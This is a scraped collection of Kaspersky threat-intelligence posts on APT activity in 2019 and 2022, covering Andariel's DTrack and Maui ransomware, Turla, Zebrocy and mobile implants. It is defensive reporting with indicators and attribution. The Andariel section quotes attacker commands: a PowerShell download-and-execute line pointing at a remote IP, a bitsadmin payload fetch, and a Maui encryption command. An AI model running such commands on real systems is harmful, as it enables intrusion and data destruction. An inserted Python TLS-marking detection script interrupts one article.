dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. 
This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. 
Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. 
The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. 
However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-10-16T10:00:26", "type": "securelist", "title": "APT trends report Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, "[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>)," related to a Stairwell report, "[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>)." Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their "first seen" date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. 
Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. 
The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface > \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using \"-t\" and \"-x\" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, \"-t 8\" sets the ransomware thread count to eight, \"-x\" commands the malware to \"self melt\", and the \"E:\" value sets the path (the entire drive in this case) to be encrypted. 
The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. 
This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and "whoami" was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). 
Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as "Backdoor.Preft" malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as "aka Dtrack, Valefor". 
Apart from the code similarity, the actor used the 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec identifies StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor's TTPs behind the Maui ransomware incident are remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-08-09T10:00:46", "id": "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "href": "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-11T13:21:36", "description": "\n\nWhat were the most interesting developments in terms of APT activity during the year and what can we learn from them?\n\nThis is not an easy question to answer, because researchers have only partial visibility and it's impossible to fully understand the motivation for some attacks or the developments behind them. However, let's try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.\n\n## Compromising supply chains\n\nTargeting supply chains has proved very successful for attackers in recent years \u2013 high-profile examples include [ShadowPad](<https://securelist.com/shadowpad-in-corporate-networks/81432/>), [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) and [the backdooring of CCleaner](<https://www.wired.com/story/ccleaner-malware-targeted-tech-firms/>). In our [threat predictions for 2019](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>), we flagged this as a likely continuing attack vector. We didn't have to wait very long to see this prediction come true.\n\nIn January, we discovered a sophisticated supply-chain attack involving the update utility of a popular consumer hardware vendor, the mechanism used to deliver BIOS, UEFI and software updates to the vendor's laptops and desktops. The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. 
The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it's possible that other samples exist that target different MAC addresses. You can read our reports on ShadowHammer [here](<https://securelist.com/operation-shadowhammer/89992/>) and [here](<https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/>).\n\n## Disinformation\n\nQ3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.\n\nIn March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the r\u00e9sum\u00e9s of the alleged attackers and a list of web shells \u2013 apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.\n\nOn April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. 
The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, \"along with information about their mother and spouse and etc.\" for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale \"highly confidential\" information related to MuddyWater. On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.\n\nFinally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (computer network operations) capabilities, as well as information about victims. Previous leaks had focused more on tools, source code and individual actor profiles.\n\nClose analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that lead us to believe that Sofacy/Hades may be connected to these leaks.\n\n## Lost in Translation and Dark Universe\n\nThe well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. 
Each check is implemented as a function that looks for a unique signature in the system \u2013 for example, a file with a unique name or registry path. Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.\n\nIn 2019, we identified the APT described as the 27th function of the sigs.py file, which we call [DarkUniverse](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>). We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.\n\nThe main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\n## Mobile attacks\n\nMobile implants are now a standard part of the toolset of many APT groups; and we have seen ample evidence of this during 2019.\n\nIn May, the [FT reported that hackers had exploited a zero-day vulnerability in WhatsApp](<https://www.ft.com/content/4da1117e-756c-11e9-be7d-6d846537acab>), enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this, not only to snoop on people's chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit \u2013 and that seemed to be that. 
However, in October, the company filed a [lawsuit accusing Israel-based NSO Group of having created the exploit](<https://techcrunch.com/2019/10/29/whatsapp-spyware-nso-group/>). WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.\n\nIn July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim's device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.\n\nIn August, Google's Project Zero team published an extensive [analysis of at least 14 iOS zero-days](<https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html>) found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. 
According to Google, the attackers used a number of 'water-holed' websites to deliver the exploits \u2013 possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received \"thousands of visitors per week\". The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, show a high level of resources and dedication.\n\nIn September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS \u2013 the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the v4l2 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it's clear that mobile exploits are a valuable commodity.\n\n## Established threat actors continue to revamp their tools\n\nWhile investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. 
This is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.\n\nThis year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The group uses two KopiLuwak analogues \u2013 the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.\n\nWe also observed a [new COMpfun-related targeted campaign](<https://securelist.com/compfun-successor-reductor/93633/>) using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a .pdb path left in some of the samples. We believe the same COMpfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don't touch the network packets at all. 
Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use PRNG to generate the 'client random' sequence during the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this 'client random' field.\n\nZebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. 
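The TLS marking described above has a consequence a defender can look for: the 32-byte client random is supposed to be fresh on every handshake, so bytes that stay constant across one host's handshakes are a signal. The following Python is an added example written for this page, not Kaspersky's or Reductor's code. It parses the ClientHello record to pull out the client random and flags clients whose randoms agree at several byte offsets. The sample ClientHellos and the 8-byte tag are constructed, and because the text does not disclose how Reductor encodes its identifier, the check is a generic heuristic rather than a signature for that implant.

```python
from collections import defaultdict

def build_client_hello(random32):
    # Constructed minimal TLS 1.2 ClientHello record: one cipher suite, no extensions.
    # Only used here to produce test input; a real detector reads records from a pcap or proxy.
    assert len(random32) == 32
    body = bytes.fromhex('0303') + random32 + bytes.fromhex('00')   # client_version, random, empty session_id
    body += bytes.fromhex('0002c02f')   # cipher_suites: length 2, TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
    body += bytes.fromhex('0100')       # compression_methods: length 1, null
    body += bytes.fromhex('0000')       # extensions: length 0
    handshake = bytes.fromhex('01') + len(body).to_bytes(3, 'big') + body   # HandshakeType client_hello(1)
    return bytes.fromhex('160301') + len(handshake).to_bytes(2, 'big') + handshake  # ContentType handshake(22)

def parse_client_random(record):
    # Walk record layer -> handshake header -> ClientHello body and return the 32-byte
    # random, or None if the bytes are not a ClientHello.
    if len(record) < 5 or record[0] != 0x16:
        return None
    rec_len = int.from_bytes(record[3:5], 'big')
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        return None
    hs_len = int.from_bytes(hs[1:4], 'big')
    body = hs[4:4 + hs_len]
    if len(body) < 34:
        return None
    return body[2:34]   # skip client_version(2); random is the next 32 bytes

def fixed_positions(randoms, skip_timestamp=True):
    # Offsets at which every random in the list carries the same byte. Offsets 0-3 are
    # skipped by default because older TLS stacks put gmt_unix_time there (RFC 5246);
    # beyond that, one fixed position across n handshakes happens by chance with
    # probability 256**-(n-1), so several fixed positions are a strong signal.
    if len(randoms) < 3:
        return []          # not enough handshakes to say anything
    start = 4 if skip_timestamp else 0
    return [i for i in range(start, 32) if len({r[i] for r in randoms}) == 1]

def find_marked_hosts(handshakes, min_fixed=4):
    # handshakes: iterable of (client_id, raw_tls_record). Returns {client_id: [offsets]}
    # for clients whose client randoms share at least min_fixed byte positions.
    by_client = defaultdict(list)
    for client, record in handshakes:
        rnd = parse_client_random(record)
        if rnd is not None:
            by_client[client].append(rnd)
    flagged = {}
    for client, randoms in by_client.items():
        positions = fixed_positions(randoms)
        if len(positions) >= min_fixed:
            flagged[client] = positions
    return flagged

# Constructed sample traffic (not real captures). 'clean' sends fresh bytes every time;
# 'marked' carries the same 8-byte tag at offsets 8-15 in every handshake, standing in
# for the host identifier the text says Reductor embeds. The tag value is made up.
TAG = 'deadbeefcafef00d'
SAMPLE = [
    ('clean',  build_client_hello(bytes.fromhex('0102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f20'))),
    ('clean',  build_client_hello(bytes.fromhex('2122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f40'))),
    ('clean',  build_client_hello(bytes.fromhex('4142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f60'))),
    ('marked', build_client_hello(bytes.fromhex('a1a2a3a4a5a6a7a8' + TAG + 'b1b2b3b4b5b6b7b8b9babbbcbdbebfc0'))),
    ('marked', build_client_hello(bytes.fromhex('c1c2c3c4c5c6c7c8' + TAG + 'd1d2d3d4d5d6d7d8d9dadbdcdddedfe0'))),
    ('marked', build_client_hello(bytes.fromhex('e1e2e3e4e5e6e7e8' + TAG + 'f1f2f3f4f5f6f7f8f9fafbfcfdfeff01'))),
]

if __name__ == '__main__':
    for client, offsets in find_marked_hosts(SAMPLE).items():
        print(client, 'has fixed client-random bytes at offsets', offsets)
```

The threshold of four fixed positions is deliberately conservative: with a proper CSPRNG even one agreeing offset across three handshakes is a roughly one-in-65,000 event, so a sustained block of identical bytes from the same source is worth a closer look regardless of which implant produced it.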
In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\nIn June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum \u2013 one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set \u2013 an example of the framework-based architecture that is becoming more and more popular. Later in the year, [we discovered Platinum using a new backdoor, which we call Titanium](<https://securelist.com/titanium-the-platinum-group-strikes-again/94961/>), in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.\n\nOne of the key findings of our 2018 report on [Operation AppleJeus](<https://securelist.com/operation-applejeus/87553/>) was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. 